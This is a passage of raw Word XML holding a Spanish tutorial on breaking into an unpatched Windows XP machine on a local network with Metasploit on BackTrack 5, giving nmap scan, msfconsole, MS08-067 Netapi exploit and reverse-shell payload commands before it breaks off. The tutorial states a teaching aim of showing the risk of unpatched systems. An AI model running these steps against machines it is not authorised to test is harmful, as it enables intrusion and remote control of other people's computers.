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2460" w:rsidRDefault="00A96C90" w:rsidP="00A96C90">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">En este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>Metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>BackTrack 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> y el famoso exploit </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>Netapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.</w:t>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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Requisitos para este tutorial:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>http://www.backtrack-linux.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>como iniciar Backtrack 5 desde un CD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Comenzamos...</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Abrimos una Terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ctrl+Alt+T) y escribimos:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>ifconfig</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Imagen 18" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\if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istrador\Mis documentos\Descargas\ifconfig.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Como podemos ver </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>nuestra IP local es 10.0.0.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">, podria ser otra del tipo 192.168.X.X o de otro tipo. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Apuntamos esta direccion</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> porque nos servira mas adelante.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2- Escaneamos la red con </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener la direccion IP de los posibles objetivos. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>nmap -sS -O [Rango de IP]</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Ejemplo: nmap -sS -O 10.0.0.1-30</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Ejemplo2: nmap -sS -O 192.168.1.1-255</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3619500" cy="3810000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Imagen 21" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\n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istrador\Mis documentos\Descargas\nmap.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3619500" cy="3810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>posiblemente es vulnerable al ataque</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">. Y su IP es </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>10.0.0.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Apuntaremos esta IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> para usarla despues.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.</w:t>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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Abrimos Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> escribiendo en la terminal:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>msfconsole</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="657225"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Imagen 23" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\msfcons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dministrador\Mis documentos\Descargas\msfconsole.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="657225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Nos saldra algo asi:</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="3248025"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Imagen 25" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\msconso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istrador\Mis documentos\Descargas\msconsole2.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="3248025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D12460" w:rsidRDefault="00A96C90" w:rsidP="00D12460">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">5- Seteamos como objetivo a la </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>IP de la PC con windows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>set RHOST [IP Objetivo]</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Ejemplo: set RHOST 10.0.0.4</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">6- Ahora cargaremos el Payload. En este tutorial </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>mostrare 2 tipos de Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> diferentes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>"windows/shell/reverse_tcp"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>"windows/vncinject/reverse_tcp"</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>discrecion</w:t>
      </w:r>
